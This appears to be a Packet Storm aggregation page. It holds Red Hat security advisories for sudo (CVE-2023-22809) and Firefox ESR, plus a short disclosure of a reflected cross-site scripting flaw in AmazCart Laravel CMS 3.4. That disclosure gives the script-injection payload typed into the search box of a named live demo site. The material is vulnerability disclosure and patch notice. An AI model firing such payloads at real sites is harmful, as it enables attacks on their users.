RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0287-01

Red Hat Security Advisory 2023-0292-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0292-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0292  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
sudo-1.8.29-5.el8_2.2.src.rpm

aarch64:  
sudo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.aarch64.rpm

ppc64le:  
sudo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.ppc64le.rpm

s390x:  
sudo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.s390x.rpm

x86_64:  
sudo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
sudo-1.8.29-5.el8_2.2.src.rpm

aarch64:  
sudo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.aarch64.rpm

ppc64le:  
sudo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.ppc64le.rpm

s390x:  
sudo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.s390x.rpm

x86_64:  
sudo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
sudo-1.8.29-5.el8_2.2.src.rpm

aarch64:  
sudo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.aarch64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.aarch64.rpm

ppc64le:  
sudo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.ppc64le.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.ppc64le.rpm

s390x:  
sudo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.s390x.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.s390x.rpm

x86_64:  
sudo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debuginfo-1.8.29-5.el8_2.2.x86_64.rpm  
sudo-debugsource-1.8.29-5.el8_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85ixdzjgjWX9erEAQhmUQ//aQCgWRhe/K+O7GQakIJAZ03l8Co9UKcO  
BU7NRr0+SC4zK7+9dD/wLFoCMGHvKN3rOSXaDEZc2hGzjFziBF0uh9X0XBHTviWo  
maMkKH81jJltJf6Dn0F2i4WS0OW4Pe6UAPz1iZAqkgN4ofMs0DL+9+JaavgDcYIT  
QCJnml114XEXfjLOe9bKFPzLqLi2yo9ALF7HDk/GsT6BmWPm2v9l25tqdV9+/XNX  
RjgT/pGiKq2WISi8p1xz3/h79gcsO2ZuBR+DZJs9cSltmscnWoA1nTU0wzp72qkH  
ysR9BXhMkXd+WE2rNIpBxI0re0JI1sqyCpHT6u4gQ+Mh3FsSCtjD94gSPQ1YZeWO  
S9dTB7/Zvn+WncUgtljQgWQIXh6+2Yii4n2o1x0XTqjNCWXycONrPcV03gdvmu6u  
JxJCMDvBS+5gTnd/dTbvexWYELKHV3qRRH/c2aEfirmZynpYQfaQrNpFg2ibAHgL  
D65VKvF9LVsJSZz7IVxZLw8xgWMvpQ7EY+e7E6zN0Nxpzc//SbFqrh668Xg7h8+R  
ZxTH1e12VexAQDKfa/UR8TvLkjIMxc+qqgyuoaSSjnvDWqUV4v0PbKiBVAYN8dzL  
84qp7p+SPf4Nk+ivslwWwZI6Ihtd09U1Yap2n61ueJF3n95MNZ6rQM08yUwdeWYA  
+pYhMpaMayk=  
=U7Tr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0292-01

Red Hat Security Advisory 2023-0288-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.7.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:0288-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0288  
Issue date:        2023-01-23  
CVE Names:         CVE-2022-46871 CVE-2022-46877 CVE-2023-23598   
                   CVE-2023-23599 CVE-2023-23601 CVE-2023-23602   
                   CVE-2023-23603 CVE-2023-23605   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.7.0 ESR.

Security Fix(es):

* Mozilla: libusrsctp library out of date (CVE-2022-46871)

* Mozilla: Arbitrary file read from GTK drag and drop on Linux  
(CVE-2023-23598)

* Mozilla: Memory safety bugs fixed in Firefox 109 and Firefox ESR 102.7  
(CVE-2023-23605)

* Mozilla: Malicious command could be hidden in devtools output  
(CVE-2023-23599)

* Mozilla: URL being dragged from cross-origin iframe into same tab  
triggers navigation (CVE-2023-23601)

* Mozilla: Content Security Policy wasn't being correctly applied to  
WebSockets in WebWorkers (CVE-2023-23602)

* Mozilla: Fullscreen notification bypass (CVE-2022-46877)

* Mozilla: Calls to <code>console.log</code> allowed bypasing Content  
Security Policy via format directive (CVE-2023-23603)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2162336 - CVE-2022-46871 Mozilla: libusrsctp library out of date  
2162338 - CVE-2023-23598 Mozilla: Arbitrary file read from GTK drag and drop on Linux  
2162339 - CVE-2023-23599 Mozilla: Malicious command could be hidden in devtools output  
2162340 - CVE-2023-23601 Mozilla: URL being dragged from cross-origin iframe into same tab triggers navigation  
2162341 - CVE-2023-23602 Mozilla: Content Security Policy wasn't being correctly applied to WebSockets in WebWorkers  
2162342 - CVE-2022-46877 Mozilla: Fullscreen notification bypass  
2162343 - CVE-2023-23603 Mozilla: Calls to <code>console.log</code> allowed bypasing Content Security Policy via format directive  
2162344 - CVE-2023-23605 Mozilla: Memory safety bugs fixed in Firefox 109 and Firefox ESR 102.7

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.7.0-1.el8_7.src.rpm

aarch64:  
firefox-102.7.0-1.el8_7.aarch64.rpm  
firefox-debuginfo-102.7.0-1.el8_7.aarch64.rpm  
firefox-debugsource-102.7.0-1.el8_7.aarch64.rpm

ppc64le:  
firefox-102.7.0-1.el8_7.ppc64le.rpm  
firefox-debuginfo-102.7.0-1.el8_7.ppc64le.rpm  
firefox-debugsource-102.7.0-1.el8_7.ppc64le.rpm

s390x:  
firefox-102.7.0-1.el8_7.s390x.rpm  
firefox-debuginfo-102.7.0-1.el8_7.s390x.rpm  
firefox-debugsource-102.7.0-1.el8_7.s390x.rpm

x86_64:  
firefox-102.7.0-1.el8_7.x86_64.rpm  
firefox-debuginfo-102.7.0-1.el8_7.x86_64.rpm  
firefox-debugsource-102.7.0-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46871  
https://access.redhat.com/security/cve/CVE-2022-46877  
https://access.redhat.com/security/cve/CVE-2023-23598  
https://access.redhat.com/security/cve/CVE-2023-23599  
https://access.redhat.com/security/cve/CVE-2023-23601  
https://access.redhat.com/security/cve/CVE-2023-23602  
https://access.redhat.com/security/cve/CVE-2023-23603  
https://access.redhat.com/security/cve/CVE-2023-23605  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIUAwUBY85iw9zjgjWX9erEAQiapA/4wGMA43IesiGn8Rm6rz1AHz6myFxHCwNF  
oBdFuwS4ZYvttDB0A/CjQdFzq8aTUE8wGNXsb8WQsrbnjF8lsyoY9tE1cCHMELyW  
EyuMZRe4hT5qZN/2sXY0RbTuWr2Dq6iLzJZ6WPxDBD0ei6woz6SbtOmFRMFxj3zW  
pgEc1JvnGDRddTGMQp9KHUqqLzP0d4KrWqJ7zn9e0MBrrHCSCwxZZfOd2BDzwXvE  
V3TGwwHx0qlygBcqSPPrXcnE9tM4Pr8iIORMUrqHuiiR1ELNJou7rOkupKdZKU9y  
wHucLsuybfZTLuHrSm8TiNr/xwx5cyzpDADn1N4c9qpi6kiY/7Cy8V6IwLEveN+2  
6AZ88wKWpch/99+tx+ZYvO94RQARCGOi4+kB0Xl5DGdtRlYKQ8uZE2a+/9JXX4Z7  
8lpxkXMZB3w6xaMAIt3tTuRAIPVrH0iO2xKMlwthHRxqbAf8ScqqWZgKDwcgn1Cj  
YDBZRZvxyHg2Mu9OPosBXabnFNy7gr4CO2XIjcsIEdU8loneq65YwzEotEwmOBiL  
ZGOCUwsYBLrZVXnPpkq/MJdO3FIxK8n8/dq1D+vOCZy1OMy2O4kg8GQdOCsSs9v5  
lJlD2u4xdu6pcFtMxmxkvHMII+J62h6adwWyMmLfGL32I8LS2RAkrxrjSEBstjaE  
mVqteuKjEw==  
=0Qi/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0288-01

AmazCart Laravel Ecommerce System CMS version 3.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: AmazCart - Laravel Ecommerce System CMS 3.4 - 'Search' Cross-Site-Scripting — Reflected (AJAX)# Date: 17/01/2023# Exploit Author: Sajibe Kanti# CVE ID:# Vendor Name: CodeThemes# Vendor Homepage: https://spondonit.com/# Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179# Version: 3.4# Tested on: Live Demo# Demo Link : https://amazy.rishfa.com/# Description #AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflectedcross-site scripting because of insufficient user-supplied datasanitization. Anyone can submit a Reflected XSS payload without login inwhen searching for a new product on the search bar. This makes theapplication reflect our payload in the frontend search ber, and it is firedeverything the search history is viewed.# Proof of Concept (PoC) : Exploit #1) Goto: https://amazy.rishfa.com/2) Enter the following payload in 'Search Iteam box' : "><script>alert(1)</script>3) Now You Get a Popout as Alert 14) Reflected XSS payload is fired# Image PoC : Reference Image #1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB

AmazCart Laravel Ecommerce System CMS 3.4 Cross Site Scripting

Red Hat Security Advisory 2023-0283-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:0283-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0283  
Issue date:        2023-01-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
sudo-1.8.29-8.el8_6.1.src.rpm

aarch64:  
sudo-1.8.29-8.el8_6.1.aarch64.rpm  
sudo-debuginfo-1.8.29-8.el8_6.1.aarch64.rpm  
sudo-debugsource-1.8.29-8.el8_6.1.aarch64.rpm

ppc64le:  
sudo-1.8.29-8.el8_6.1.ppc64le.rpm  
sudo-debuginfo-1.8.29-8.el8_6.1.ppc64le.rpm  
sudo-debugsource-1.8.29-8.el8_6.1.ppc64le.rpm

s390x:  
sudo-1.8.29-8.el8_6.1.s390x.rpm  
sudo-debuginfo-1.8.29-8.el8_6.1.s390x.rpm  
sudo-debugsource-1.8.29-8.el8_6.1.s390x.rpm

x86_64:  
sudo-1.8.29-8.el8_6.1.x86_64.rpm  
sudo-debuginfo-1.8.29-8.el8_6.1.x86_64.rpm  
sudo-debugsource-1.8.29-8.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY85iwNzjgjWX9erEAQjCsA/9HP82/O0z4Tf3GjNNewy1W6xUWJHsGcWg  
CN9yQ9VEnoItydntEGr/P+qxWbsiztP/CjeS8lSCDKIIeiuAsp7Jn7U538OFjkd1  
gcDXsnhAahuqEGVFM9wpvxInfg0wb7rZKSDTOadNonC0HBGGTQkEvNXOdaDYHYC+  
M4+V+wTpjsx8xX6l0xSeruek6Ad627qRFp5xc6oiRur2zM9ef8odZE3C8hjnVqH/  
pbtJWHJbqXZAzxX93XekV0AIAbtpvVfAQ70cAVsJjQgBBtLYKx7N5P9rqpUwzpeS  
r0ce8dwrYCq28wmkOBo2Y/9YayoSSuB81Z/SpeShbx+tB9BYpINIOgjZzkVPS0QT  
AnTsQyJnGihTdjaVqrkNjhA3PBAfF5s0to8HycTH5fuFcsSRXAaBjokH8V2sya1t  
UTo7jNYkOiJbOOisqxvGdF8OBqRmDc+5zQvUlNHcK+8LrMdHK65XO9wiZKBAjVa1  
jz3XZGKXvSgLV2OaGjXRhBcEfQpj3xQwfxifRobZdzpbhwcitaEmLGKxi3/JJjst  
YtdsQZTcZZvXCPGi2LUJXZ2VuEIAX58G6dxofvtBk8EjjcgZyAF4SMum6Hbh//bV  
Q2Vlzq/Ct9MtfnqCIk1Esd2lMpm5eT8Pr5lywlV0ZCyBF1tA4s3HLHtU2IwZwl8a  
vvC2JWj7np4=  
=Ysng  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm